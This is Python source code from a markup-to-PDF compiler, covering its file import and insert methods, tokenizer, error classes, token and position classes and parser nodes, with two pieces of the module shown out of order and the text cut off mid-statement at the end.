Placer. The "document" returned by this method is a list of Tokens that can be given to a Placer to produce a PDFDocument. """ ci = self._curr_interpreter() return None if ci is None else ci._curr_document def _compiler_import_file(self, file_path, print_progress=False): """ Imports a file. If the file has not already been imported by the compiler, this method will read in the file, tokenize, and parse it into an Abstract Syntax Tree (AST), before caching the raw_text, tokens, and ast in a File object and returning the File object. If the file has already been imported, this method will return the cached File object. To run the file object, the root of the AST must be visited by the Interpreter. This can be acheived by doing Interpreter().visit_root(file.ast) """ assert path.isfile(file_path), f'Could not import "{file_path}"' file_path = path.abspath(file_path) # If file already imported, just return the file if file_path in self._files_by_path: return self._files_by_path[file_path] file = File(file_path) self._files_by_path[file_path] = file try: with open(file_path, encoding=self._encoding) as f: file.raw_text = f.read() # Raw text that the file contains except: raise AssertionError(f'Could not decode the given file as {self._encoding}.') file.tokens = Tokenizer(file.file_path, file.raw_text, print_progress_bar=print_progress).tokenize() # Returns a ParseResult, so need to see if any errors. If no Errors, then set file.ast to the actual abstract syntax tree file.ast = Parser(file.tokens, print_progress_bar=print_progress).parse() if file.ast.error is not None: raise file.ast.error else: file.ast = file.ast.node return file def _run_file(self, file, context, print_progress=False): """ Runs a file, importing it first if need be, and returns the tokens and context that that the file generates. By "import", I mean that it loads the file into memory, tokenizes it and makes it into an AST, not that it does the same thing as the \\import command context is the current Context that you want the file to be run in. """ if isinstance(file, str): # It should be a file path file_obj = self._compiler_import_file(file, print_progress) else: # It should be a File object file_obj = file if file_obj.being_run: raise AssertionError(f"The given file is already being run (imported or inserted), so you probably have a circular import which is not allowed: {file_obj.file_path}") else: file_obj.being_run = True self._push_interpreter() # Save the context's current display_name and file_path old_disp_name = context.display_name old_path = context.file_path # Give the context the display name and file path of the file it is now # going into context.display_name = file_obj.file_path context.file_path = file_obj.file_path # Since just pushed interpreter, self._curr_interpreter() should not be None result = self._curr_interpreter().visit_root(file_obj.ast, context, InterpreterFlags(), print_progress) # Restore the context's display name and file_path to what they were before context.display_name = old_disp_name context.file_path = old_path self._pop_interpreter() if result.error: raise result.error file_obj.being_run = False return result.value # Return the tokens gotten by running the file def _insert_file(self, file_path, context, print_progress=False): """ Inserts the file into the current file. This means that the file must be run with the current context as if it were directly in the file. context is the context that this file is being inserted into """ # Since the context is directly given to self._run_file, all of the # commands and whatnot in the global portion of the file will be # added to the given context as if it was in the context directly # and not in another file was_global = context.global_level context.global_level = True i = len(context.token_document()) self._run_file(file_path, context, print_progress) # Want to add a space before the first Token we come accross. # Note: the compiler may still not render a space before the token # if the token is at the start of a line. That is why this is safe # to do. We are meely saying "this Token should have a space before # it if it makes sense to have one before it" doc = context.token_document() ci = self._curr_interpreter() if ci and ci.curr_command_node(): ccc = ci.curr_command_node() length = len(doc) while True: if i >= length: # reached end of Token document without finding a single # Token break curr = doc[i] if isinstance(curr, Token): # Found a Token so set whether it has a space before it based # on the current command that is being run and whether # the command has a space before it (i.e. if there is # space before \insert{file_path}, then the first token # of the inserted text from the file should have a space # before it, otherwise it should not have a space before # it) curr.space_before = ccc.cmnd_name.space_before break i += 1 context.global_level = was_global def _import_file(self, file_path, context, commands_to_import=None, print_progress=False): """ Imports a file. This is very different from self._insert_file because it takes the file, gives it a fresh context, and runs the file. The resulting context can be saved to the File object for the file because the resulting global context from running the file does not depend on any other file's context. In this way, once a file is imported once, its resulting tokens and Context can be reused over and over again, whereas the tokens and Context from self._insert_file cannot be and the file must be re-run every time it is inserted into a file, regardless of whether it has been inserted into a file before. context is the context that you want to import the file into. If commands_to_import are given, then only the commands by the names specified in the list of strings will be imported. All Python globals will still, however, be imported. """ file_obj = self._compiler_import_file(file_path, print_progress) if file_obj.import_context is None: # Since this file has not yet been run, we will have to run it # now with a fresh context unrelated to any other context # Using file_obj.file path in case it is different from the argument file_path context_to_import = self._fresh_context(file_obj.file_path) tokens = self._run_file(file_obj, context_to_import, print_progress) # Since the file was imported, that means it does not depend on the # current context and thus the context can be saved and reused later file_obj.import_context = context_to_import # I expect most imports to have some global Python code that they # want to be run on the second pass, so that code must be imported # too or else it will never reach the Placer and be run. tokens_to_import = [] for token in tokens: if isinstance(token, Token) and token.type in (TT.EXEC_PYTH2, TT.EVAL_PYTH2): tokens_to_import.append(token) file_obj.import_tokens = tokens_to_import else: # Since this file has been imported before, just reuse the same # context as last time because the context is not dependant # on the current context of when/where the file is being run context_to_import = file_obj.import_context tokens_to_import = file_obj.import_tokens try: context.import_(context_to_import, tokens_to_import, commands_to_import) except AssertionError as e: raise AssertionError(f'{file_path} could not be imported because of the following error:{e}') def _path_to_std_file(self, file_path): """ Returns the file path as a file path to a standard directory file. """ # Replace the ending of the file path with the one used by all standard files split_file_path = file_path.split('.') if len(split_file_path) > 1 and split_file_path[-1] == STD_FILE_ENDING: split_file_path.pop() split_file_path.append(STD_FILE_ENDING) file_path = '.'.join(split_file_path) # check if the file exists file_path = path.abspath(path.join(self._std_dir_path, file_path)) return file_path def _path_rel_to_file(self, file_path, curr_file=True): """ Returns the file path if the given path is relative to the main file being run or the current file being run. """ dir = self.curr_file_dir() if curr_file else self.main_file_dir() file_path = path.abspath(path.join(dir, file_path)) return file_path def _get_near_path(self, file_path): """ Gets the near path to insert/import. This checks the path relative to to the current file first, then checks the file relative to the main/input file, and then it checks the standard directory. """ ret_path = cf_rel_path = self._path_rel_to_file(file_path, curr_file=True) if not path.isfile(ret_path): ret_path = input_rel_path = self._path_rel_to_file(file_path, curr_file=False) if not path.isfile(ret_path): _file_path, file_name = path.split(file_path) ret_path = std_path = self._path_to_std_file(file_path) assert path.isfile(std_path), f'Could not get near path for "{file_path}" because neither "{cf_rel_path}", nor "{input_rel_path}", nor "{std_path}" lead to a file and/or exist.' return ret_path def _get_far_path(self, file_path): """ Gets the far path to insert/import. This checks the standard directory first and then checks the path relative to the main/input file and then checks the path relative to the current file. """ _file_path, file_name = path.split(file_path) ret_path = std_path = self._path_to_std_file(file_path) if not path.isfile(ret_path): ret_path = input_rel_path = self._path_rel_to_file(file_path, curr_file=False) if not path.isfile(ret_path): ret_path = cf_rel_path = self._path_rel_to_file(file_path, curr_file=True) assert path.isfile(std_path), f'Could not get far path for "{file_path}" because neither "{std_path}", nor "{input_rel_path}", nor "{cf_rel_path}" lead to a file and/or exist.' return ret_path # ------------------------------------ # Methods available from CompilerProxy # Methods for Inserting and Importing Files def insert_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot insert into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._insert_file(self._get_near_path(file_path), cc, print_progress=self._print_progress_bars) def strict_insert_file(self, file_path): """ Runs the file at the given file path and inserts it into the current document. The file path is assumed to be relative to the current file. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot insert into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' # Actually insert the file self._insert_file(self._path_rel_to_file(file_path), cc, print_progress=self._print_progress_bars) def far_insert_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot far insert into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._insert_file(self._get_far_path(file_path), cc, print_progress=self._print_progress_bars) def strict_import_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. This file path is assumed to be relative to the main file being run. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot import into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._import_file(self._path_rel_to_file(file_path), cc, print_progress=self._print_progress_bars) def import_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot import into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._import_file(self._get_near_path(file_path), cc, print_progress=self._print_progress_bars) def std_import_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot import into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._import_file(self._path_to_std_file(file_path), cc, print_progress=self._print_progress_bars) def far_import_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot import into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._import_file(self._get_far_path(file_path), cc, print_progress=self._print_progress_bars) # Methods for retrieving files and directories for the current file. def main_file_path(self): """ Returns the file path to the main/first/input file that is/was run. """ return self._input_file_path def main_file_dir(self): """ Returns an absolute path to the directory that the main file that is being run is in. """ return path.dirname(self.main_file_path()) def curr_file_path(self): """ Returns an absolute path to the current file that is being run. """ cc = self._curr_context() assert cc is not None, f'The current context was None so the current file path could not be retrieved.' return cc.file_path def curr_file_dir(self): """ Returns an absolute path to the directory that the current file that is being run is in. """ return path.dirname(self.curr_file_path()) # Misc Methods def placer_class(self): return self._placer_class def set_placer_class(self, placer_class): """ Sets the placer class that will be used to place the tokens on the PDF. This allows a person to, theoretically, create their own placer in a pdfo file and make the compiler use that instead. """ self._placer_class = placer_class class Command: """ Represents a command in the file. """ __slots__ = ['params', 'key_params', 'text_group'] def __init__(self, params, key_params, text_group): self.params = params self.key_params = key_params self.text_group = text_group # This will be run for the command
""" This is the main file that holds the Tokenizer, Parser, and Interpreter that actually compile the PDF. """ import os.path as path import re import copy as _copy from decimal import Decimal from placer.placer import Placer from constants import CMND_CHARS, END_LINE_CHARS, ALIGNMENT, TT, TT_M, WHITE_SPACE_CHARS, NON_END_LINE_CHARS, PB_NUM_TABS, PB_NAME_SPACE, STD_FILE_ENDING, STD_LIB_FILE_NAME, OUT_TAB from tools import assure_decimal, is_escaped, is_escaping, exec_python, eval_python, string_with_arrows, trimmed, print_progress_bar, prog_bar_prefix, calc_prog_bar_refresh_rate, assert_instance from marked_up_text import MarkedUpText from markup import Markup, MarkupStart, MarkupEnd from toolbox import ToolBox from placer.placers.naiveplacer import NaivePlacer # ----------------------------------------------------------------------------- # Errors That Can Occur While Compiling class Error(Exception): def __init__(self, pos_start, pos_end, error_name, details): self.pos_start = pos_start self.pos_end = pos_end self.error_name = error_name self.details = details def as_string(self): result = f'Line {self.pos_start.ln + 1}, Column {self.pos_start.col + 1}, in file {self.pos_start.file_path}\n' result += f' {self.error_name} Occured: {self.details}' result += '\n' + string_with_arrows(self.pos_start.file_text, self.pos_start, self.pos_end) return result class ExpectedValidCmndNameError(Error): def __init__(self, pos_start, pos_end, details): super().__init__(pos_start, pos_end, 'Expected Valid Command Name', details) class IllegalCharError(Error): def __init__(self, pos_start, pos_end, details): super().__init__(pos_start, pos_end, 'Illegal Character Error', details) class ExpectedCharError(Error): def __init__(self, pos_start, pos_end, details): super().__init__(pos_start, pos_end, 'Expected Character Error', details) class InvalidSyntaxError(Error): def __init__(self, pos_start, pos_end, details=''): super().__init__(pos_start, pos_end, 'Invalid Syntax Error', details) class RunTimeError(Error): def __init__(self, pos_start, pos_end, details, context): super().__init__(pos_start, pos_end, 'Run-Time Error', details) self.context = context def generate_traceback(self): result = '' pos = self.pos_start ctx = self.context while ctx is not None: result = f' File {pos.file_path}, line {pos.ln + 1}, in {ctx.display_name}\n' + result pos = ctx.entry_pos ctx = ctx.parent return 'Traceback (most recent call last):\n' + result class PythonException(RunTimeError): def __init__(self, pos_start, pos_end, details, python_error, context): import traceback self.python_error = f'{python_error.exc_trace}' super().__init__(pos_start, pos_end, details, context) self.error_name = 'Python Exception' def as_string(self): string = super().as_string() string += '\nHere is the Python Exception:\n\n' string += f'{self.python_error}' return string # ----------------------------------------------------------------------------- # Position Class class Position: """ Position in a Tokenized file or a file that is being tokenized. """ __slots__ = ['idx', 'ln', 'col', 'file_path', 'file_text'] def __init__(self, idx, ln, col, file_path, file_text): self.idx = idx self.ln = ln self.col = col self.file_path = file_path # The path tot he file that this is a position in self.file_text = file_text # The text of the file this is a position in def advance(self, current_char=None): self.idx += 1 self.col += 1 if current_char in END_LINE_CHARS: self.ln += 1 self.col = 0 return self def copy(self): return Position(self.idx, self.ln, self.col, self.file_path, self.file_text) def __repr__(self): file = self.file_path.split('\\')[-1] return f"{self.__class__.__name__}(line {self.ln}, col {self.col}, in {file})" # ----------------------------------------------------------------------------- # File Class class File: __slots__ = ['file_path', 'raw_text', 'tokens', 'ast', 'import_context', 'import_tokens', 'being_run'] def __init__(self, file_path): self.file_path = file_path # Path to file # Fields set in Compiler._compiler_import_file self.raw_text = None # The raw text that is in the file self.tokens = None # The tokens that make up the File once it has been tokenized self.ast = None # The Abstract Syntax tree from the Tokens being Parsed # Fields set by Compiler._import_file self.import_context = None # The context obtained by running the file, can be used to import this file into another file self.import_tokens = None # The tokens to add to the token_document when the file is imported self.being_run = False # ----------------------------------------------------------------------------- # Token Class class Token: __slots__ = ['start_pos', 'end_pos', 'type', 'value', 'space_before'] def __init__(self, type, value, start_pos, end_pos=None, space_before=True): self.start_pos = start_pos if isinstance(space_before, bool): # Space before is whether there should be a space before the token # when it is put on the page. This is so that tokens like the # '=' and '{' that are singled out of a sentence can still tell # the placer whether there was space before them because the # default is to just put a space before each token is placed down. self.space_before = space_before else: self.space_before = (space_before in WHITE_SPACE_CHARS) if end_pos is None: end_pos = self.start_pos.copy() end_pos.advance() # Necessary if you want errors to display the errors correctly because they use start_pos - end_pos self.end_pos = end_pos else: self.end_pos = end_pos self.type = type self.value = str(value) if type == TT.WORD and value == '': raise Exception(f'An empty string has been made into a Token. This is a compiler problem. {self}') def matches(self, token_type, value): """ Checks if the given token_type and value matches this one. """ return self.type == token_type and self.value == value def copy(self): start_pos = None if self.start_pos is None else self.start_pos.copy() end_pos = None if self.end_pos is None else self.end_pos.copy() return Token(self.type, self.value, start_pos, end_pos, self.space_before) def gen_pass_2_python(self, locals): """ Generates a SecondPassPythonToken that can store the locals that should be provided when the python code is run in the Placer. The Placer already has the globals that should be provided. """ start_pos = None if self.start_pos is None else self.start_pos.copy() end_pos = None if self.end_pos is None else self.end_pos.copy() return SecondPassPythonToken(self.type, self.value, start_pos, end_pos, self.space_before, locals) def __repr__(self): """ This is what is called when you print this object since __str__ is undefined. """ return f"Token(\"<{self.type}>\":{' ' if self.space_before else ''}{self.value})" class SecondPassPythonToken(Token): __slots__ = Token.__slots__[:] __slots__.extend(['locals']) def __init__(self, type, value, start_pos, end_pos=None, space_before=False, locals=None): super().__init__(type, value, start_pos, end_pos, space_before) self.locals = locals # ----------------------------------------------------------------------------- # Tokenizer Class class Tokenizer: """ Takes raw text and tokenizes it. """ def __init__(self, file_path, file_text, starting_position=None, print_progress_bar=False): super().__init__() self._print_progress_bar = print_progress_bar if starting_position: # Parse assuming that you are starting at the given line and column int he file self._pos = starting_position.copy() self._pos.idx = -1 else: # Parse assuming that you are starting at the beginning of the file self._pos = Position(-1, 0, -1, file_path, file_text) self._text = file_text self._current_char = None self._previous_char = '' self._plain_text = '' self._plain_text_start_pos = None self._space_before_plaintext = False self._unpaired_cbrackets = 0 self._unpaired_oparens = 0 self._tokens = [] self._advance() def _advance(self, num=1): """Advances to the next character in the text if it should advance.""" for i in range(num): self._previous_char = self._current_char self._pos.advance(self._current_char) self._current_char = self._text[self._pos.idx] if self._pos.idx < len(self._text) else None @staticmethod def plaintext_tokens_for_str(string, count_starting_space=False): """ If you want to write plaintext to the placer and the string to be interpreted only as plaintext, then this is what you use to tokenize the string. Just take the return-ed string from this method and give it to the place_text method of the Placer. If count_starting_space is True, then it will treat the whitespace before the first letter as actual space that could produce a paragraph break """ tokens = [] idx = -1 cc = None def next_tok(idx): idx += 1 return string[idx] if idx < len(string) else None, idx def try_append_word(curr_word, space_before): curr_word = re.sub('(\s)+', '', curr_word) if len(curr_word) > 0: tokens.append(Token(TT.WORD, curr_word, DUMMY_POSITION.copy(), space_before=space_before)) cc, idx = next_tok(idx) if not count_starting_space: # Eat all end line chars at beginning so no paragraph break at beginning while (cc is not None) and (cc in END_LINE_CHARS): cc, idx, = next_tok(idx) space_before = False curr_word = '' while cc is not None: if cc in NON_END_LINE_CHARS: cc, idx = next_tok(idx) try_append_word(curr_word, space_before) curr_word = '' space_before = True while (cc is not None) and (cc in NON_END_LINE_CHARS): cc, idx, = next_tok(idx) continue elif cc in END_LINE_CHARS: cc, idx = next_tok(idx) try_append_word(curr_word, space_before) curr_word = '' space_before = True if cc in END_LINE_CHARS: tokens.append(Token(TT.PARAGRAPH_BREAK, TT.PARAGRAPH_BREAK, DUMMY_POSITION.copy())) cc, idx = next_tok(idx) while (cc is not None) and (cc in END_LINE_CHARS): cc, idx, = next_tok(idx) continue else: curr_word += cc cc, idx = next_tok(idx) try_append_word(curr_word, space_before) return tokens @staticmethod def marked_up_text_for_tokens(list_of_tokens): """ Returns a MarkedUpText object that is equivalent to the List of Tokens given. """ text = MarkedUpText() curr_index = 0 pending_markups = [] for t in list_of_tokens: if isinstance(t, (MarkupStart, MarkupEnd)): text.add_markup_start_or_end(t, curr_index) elif isinstance(t, Token): if t.type == TT.PARAGRAPH_BREAK: # Add two newlines to signify a paragraph break text += '\n\n' curr_index += 2 elif t.type in (TT.EXEC_PYTH2, TT.EVAL_PYTH2): markup = Markup() markup.add_python(t) text.add_markup(markup, curr_index) else: if t.space_before: text += ' ' curr_index += 1 text += t.value curr_index += len(t.value) else: raise Exception(f'{t} was in the list of tokens given to be changed into MarkedUpText, but MarkedUpText can\'t denote it. This is a compiler problem, tell the makers of the compiler that you got this error.') text_len = len(text) #print(f'curr_index = {curr_index}, text_len = {text_len}, markups = {None if text_len not in text._markups else text._markups[text_len]}') if text_len > 0 and text_len in text._markups: markups = text._markups.pop(text_len) index = text_len - 1 if index in text._markups: text._markups[index].extend(markups) else: text._markups[index] = markups #print(f'AFTER markups = {None if index not in text._markups else text._markups[index]}') return text @staticmethod def tokens_for_marked_up_text(marked_up_text): """ Returns a list of tokens for the given MarkedUpText. """ def try_token(token_value, token_list): if len(token_value) > 0: space_before = (token_value[0] in WHITE_SPACE_CHARS) tokens = Tokenizer.plaintext_tokens_for_str(str(token_value), True) token_value = '' if len(tokens) > 0: tokens[0].space_before = space_before token_list.extend(tokens) return token_value, token_list token_list = [] token_value = '' pending_end_markups = [] for i, char in enumerate(marked_up_text): markups = marked_up_text.markups_for_index(i) # markups is a list of MarkupStart and MarkupEnd objects or # None if there are None # Since Markups are inclusive of their index, the MarkupStarts must # be appended before the next char and the MarkupEnds must be # appended after the next character is added if markups: token_value, token_list = try_token(token_value, token_list) for markup in markups: if isinstance(markup, MarkupStart): token_list.append(markup) else: pending_end_markups.append(markup) token_value += char if pending_end_markups: token_value, token_list = try_token(token_value, token_list) for markup in pending_end_markups: token_list.append(markup) pending_end_markups = [] token_value, token_list = try_token(token_value, token_list) return token_list _what_can_be_escaped = {'{', '}', '=', '\\', '(', ')', ','} def tokenize(self, file=True): """ Turn the raw text into tokens that the compiler can use. If file is true, the tokenizer assumes that the text is from a file and bookends the tokens with TT.FILE_START and TT.FILE_END """ self._tokens = [] self._plain_text = '' what_can_be_escaped = self._what_can_be_escaped if file: self._tokens.append(Token(TT.FILE_START, '<FILE START>', self._pos.copy())) print_progress = self._print_progress_bar if print_progress: text_len = len(self._text) prefix = prog_bar_prefix('Tokenizing', self._pos.file_path) refresh = calc_prog_bar_refresh_rate(text_len) full_bar_printed = False if print_progress_bar(0, text_len, prefix): full_bar_printed = True # By default, all text is plain text until something says otherwise while self._current_char is not None: i = self._pos.idx if print_progress and (i % refresh) == 0: print_progress_bar(i, text_len, prefix) cc = self._current_char t = None if is_escaped(i, self._text, what_can_be_escaped): self._plain_text_char() elif is_escaping(i, self._text, what_can_be_escaped): self._advance() # Just advance because it is just escaping something else elif cc in END_LINE_CHARS: self._try_word_token() self._advance() pos_start = self._pos.copy() if self._current_char in END_LINE_CHARS: while self._current_char in END_LINE_CHARS: # Do nothing, just eat the END_LINE_CHARS now that we know that there is a PARAGRAPH_BREAK self._advance() t = Token(TT.PARAGRAPH_BREAK, TT.PARAGRAPH_BREAK, pos_start, self._pos.copy()) elif cc in NON_END_LINE_CHARS: self._try_word_token() self._advance() elif cc == '{': if self._unpaired_cbrackets == 0: self._first_unpaired_bracket_pos = self._pos.copy() self._unpaired_cbrackets += 1 t = Token(TT.OCBRACE, '{', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == '}': self._unpaired_cbrackets -= 1 if self._unpaired_cbrackets < 0: raise InvalidSyntaxError(self._pos.copy(), self._pos.copy().advance(), 'Unpaired, unescaped, closing curly bracket "}". You need to add an open curly bracket "{" before it or escape it by putting a backslash before it.') t = Token(TT.CCBRACE, '}', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == '=': t = Token(TT.EQUAL_SIGN, '=', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == '(': if self._unpaired_oparens == 0: self._first_unpaired_oparens_pos = self._pos.copy() self._unpaired_oparens += 1 t = Token(TT.OPAREN, '(', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == ')': self._unpaired_oparens -= 1 if self._unpaired_oparens < 0: raise InvalidSyntaxError(self._pos.copy(), self._pos.copy().advance(), 'Unpaired, unescaped, closing parenthesis ")". You need to add an open curly bracket "(" before it or escape it by putting a backslash before it.') t = Token(TT.CPAREN, ')', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == ',': t = Token(TT.COMMA, ',', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == '\\': t = self._tokenize_cntrl_seq() else: self._plain_text_char() if t is not None: # Actually append the Token (or list of tokens) if there is a Token to append self._try_word_token() if isinstance(t, Token): self._tokens.append(t) else: # t must be a list of tokens self._tokens.extend(t) if print_progress and not full_bar_printed: print_progress_bar(text_len, text_len, prefix) if self._unpaired_cbrackets > 0: raise InvalidSyntaxError(self._first_unpaired_bracket_pos.copy(), self._first_unpaired_bracket_pos.copy().advance(), f'{self._unpaired_cbrackets} unpaired, unescaped, opening curly bracket(s) "{" starting from this opening curly bracket. Either escape each one by putting a backslash before them or pair them with a closing curly bracket "}".') if self._unpaired_oparens > 0: raise InvalidSyntaxError(self._first_unpaired_oparens_pos.copy(), self._first_unpaired_oparens_pos.copy().advance(), f'{self._unpaired_oparens} unpaired, unescaped, opening parenthes(es) "(" starting from this open parenthes(es). Either escape each one by putting a backslash before them or pair them with a closing parenthesis ")".') self._try_word_token() if file: self._tokens.append(Token(TT.FILE_END, '<FILE END>', self._pos.copy())) return self._tokens # ------------------------------------------------------------------------- # Parsing Methods def _tokenize_cntrl_seq(self): """ Parse a control sequence. """ t = None pos_start = self._pos.copy() # NOTE: Multi-line matches tend be longer and so need to come before # single-line matches because shorter matches will match before longer # matches, even if the longer match would have worked had it been tried # Multiple Line Python ---------------------- if self._match(TT_M.MULTI_LINE_PYTH_1PASS_EXEC_START): t = self._tokenize_python(TT_M.MULTI_LINE_PYTH_1PASS_EXEC_END, 1, pos_start) elif self._match(TT_M.MULTI_LINE_PYTH_1PASS_EVAL_START): t = self._tokenize_python(TT_M.MULTI_LINE_PYTH_1PASS_EVAL_END, 1, pos_start, use_eval=True) elif self._match(TT_M.MULTI_LINE_PYTH_2PASS_EXEC_START): t = self._tokenize_python(TT_M.MULTI_LINE_PYTH_2PASS_EXEC_END, 2, pos_start) elif self._match(TT_M.MULTI_LINE_PYTH_2PASS_EVAL_START): t = self._tokenize_python(TT_M.MULTI_LINE_PYTH_2PASS_EVAL_END, 2, pos_start, use_eval=True) # One Line Python ----------------------- elif self._match(TT_M.ONE_LINE_PYTH_1PASS_EXEC_START): t = self._tokenize_python(TT_M.ONE_LINE_PYTH_1PASS_EXEC_END, 1, pos_start, one_line=True) elif self._match(TT_M.ONE_LINE_PYTH_1PASS_EVAL_START): t = self._tokenize_python(TT_M.ONE_LINE_PYTH_1PASS_EVAL_END, 1, pos_start, one_line=True, use_eval=True) elif self._match(TT_M.ONE_LINE_PYTH_2PASS_EXEC_START): t = self._tokenize_python(TT_M.ONE_LINE_PYTH_2PASS_EXEC_END, 2, pos_start, one_line=True) elif self._match(TT_M.ONE_LINE_PYTH_2PASS_EVAL_START): t = self._tokenize_python(TT_M.ONE_LINE_PYTH_2PASS_EVAL_END, 2, pos_start, one_line=True, use_eval=True) # Comment ---------------------- elif self._match(TT_M.MULTI_LINE_COMMENT_START): t = self._tokenize_comment(pos_start, one_line=False) elif self._match(TT_M.SINGLE_LINE_COMMENT_START): t = self._tokenize_comment(pos_start, one_line=True) # Command -------------------------- else: # It is an identifier, so tokenize it t = self._tokenize_identifier() return t def _tokenize_python(self, end_codes, pass_num, pos_start, one_line=False, use_eval=False): """ Parses the string from self._pos as python code until one of the end_codes are reached. If one_line is true, that means that this python statement is supposed to only be one line so it cannot turn the rest of the file into python. """ python_str = '' pos_end = self._pos.copy() match_found = False while self._current_char is not None: if self._match(end_codes, False): # Only eat the chars if they are not in the END_LINE_CHARS. # Otherwise it is needed in order to determine whether to put # in a PARAGRAPH_BREAK if not self._current_char in END_LINE_CHARS: self._match(end_codes) match_found = True break else: # Since python has not ended yet, just add the given char to it python_str += self._current_char self._advance() if (self._current_char is None) and (not match_found) and (not one_line): raise InvalidSyntaxError(pos_start, pos_end, f'You made the rest of your file Python because there was no matching character sequence to end the Python section of your document denoted by this character sequence.') pos_end = self._pos.copy() if pass_num == 1: if use_eval: return Token(TT.EVAL_PYTH1, python_str, pos_start, pos_end) else: return Token(TT.EXEC_PYTH1, python_str, pos_start, pos_end) else: if use_eval: return Token(TT.EVAL_PYTH2, python_str, pos_start, pos_end) else: return Token(TT.EXEC_PYTH2, python_str, pos_start, pos_end) def _tokenize_comment(self, pos_start, one_line=False): """ Parses a comment, basically just eating any characters it finds until the comment is done. None of the characters are put into any Token, so the Parser will never even see them. """ pos_end = self._pos.copy() if one_line: # Its a one_line comment while self._current_char is not None: if self._match(TT_M.SINGLE_LINE_COMMENT_END): break else: self._advance() else: found_match = False # it's a continous comment, so parse until '<-%\' or '<-#\' is found while self._current_char is not None: if self._match(TT_M.MULTI_LINE_COMMENT_END): found_match = True break else: self._advance() if self._current_char is None and not found_match: raise InvalidSyntaxError(pos_start, pos_end, 'You commented out the rest of your file because there was no matching "<-%\\" or "<-#\\" to end the comment.') if len(self._tokens) > 0 and self._tokens[-1].type == TT.PARAGRAPH_BREAK: # Need to eat all end line white space now so that another # PARAGRAPH_BREAK cannot be produced due to this comment text being # ignored and there being white space before it. Two PARAGRAPH_BREAKs # next to eachother breaks all grammar rules and causes the Parser # to terminate early (i.e. before it reaches the FILE_END token) while self._current_char in END_LINE_CHARS: self._advance() def _tokenize_identifier(self): """ Tokenize an identifier like \\bold or \\i """ identifier_name = '' start_pos = self._pos.copy() space_before = self._previous_char #tokens = [] #tokens.append(Token(TT.BACKSLASH, '\\', start_pos.copy(), self._pos.copy(), space_before=space_before)) self._advance() # advance past '\\' problem_start = self._pos.copy() while self._current_char is not None: if self._current_char in CMND_CHARS: identifier_name += self._current_char self._advance() else: if len(identifier_name) == 0: raise ExpectedValidCmndNameError(problem_start, self._pos.copy(), f'All commands must specify a valid name with all characters of it in {CMND_CHARS}\n"{self._current_char}" is not one of the valid characters. You either forgot to designate a valid command name or forgot to escape the backslash before this character.') token = Token(TT.IDENTIFIER, identifier_name, start_pos.copy(), self._pos.copy(), space_before=space_before) return token # ------------------------------------------------------------------------- # Other Helper Methods def _try_word_token(self): """ Create a WORD token given what is in self._plain_text """ self._plain_text = re.sub('(\s)+', '', self._plain_text) if len(self._plain_text) > 0: self._tokens.append(Token(TT.WORD, self._plain_text, self._plain_text_start_pos, self._pos.copy(), space_before=self._space_before_plaintext)) self._space_before_plaintext = False self._plain_text = '' self._plain_text_start_pos = None def _plain_text_char(self): """ The current_char is a plain_text character """ if self._plain_text_start_pos is None: self._plain_text_start_pos = self._pos.copy() if self._pos.idx - 1 >= 0: self._space_before_plaintext = (self._text[self._pos.idx - 1] in WHITE_SPACE_CHARS) else: self._space_before_plaintext = False self._plain_text += self._current_char self._advance() def _match(self, matches:list, advance_past_on_match=True): """ Takes the given list of strings to match and sees if any of them match the text at the current index of the self._text This method does not look forward in the text for a match, just returns True if the string starting at the current index matches any of the matches. If advance_past_on_match, then if this method matches something, it will advance past the string it matched. """ index = self._pos.idx for str_to_match in matches: if ((index + len(str_to_match)) < len(self._text)) \ and (str_to_match == self._text[index:index + len(str_to_match)]): if advance_past_on_match: self._advance(len(str_to_match)) return True return False # ----------------------------------------------------------------------------- # Nodes for Parser DUMMY_POSITION = Position(0, 0, 0, 'Dummy File Name', 'Dummy File Text') class LeafNode: """ Base class for all Leaf Nodes (nodes that can only have one token) """ __slots__ = ['start_pos', 'end_pos'] def __init__(self, token): """ Takes a token and sets the start and end positions using it. Still must name the token in the actual node (i.e. self.writing, etc.) """ self.start_pos = token.start_pos self.end_pos = token.end_pos class FileNode: __slots__ = ['start_pos', 'end_pos', 'file_start', 'document', 'file_end'] def __init__(self, file_start, document, file_end): self.file_start = file_start # Token self.document = document # DocumentNode self.file_end = file_end # Token self.start_pos = file_start.start_pos self.end_pos = file_end.end_pos def __repr__(self): return f'{self.__class__.__name__}({self.file_start}, {self.document}, {self.file_end})' class DocumentNode: __slots__ = ['start_pos', 'end_pos', 'starting_paragraph_break', 'paragraphs', 'ending_paragraph_break'] def __init__(self, paragraphs, starting_paragraph_break=None, ending_paragraph_break=None): self.starting_paragraph_break = starting_paragraph_break # Token self.paragraphs = paragraphs # List of ParagraphNodes self.ending_paragraph_break = ending_paragraph_break # Token if starting_paragraph_break: self.start_pos = starting_paragraph_break.start_pos elif len(paragraphs) > 0: self.start_pos = paragraphs[0].start_pos else: self.start_pos = DUMMY_POSITION.copy() if len(paragraphs) > 0: self.end_pos = 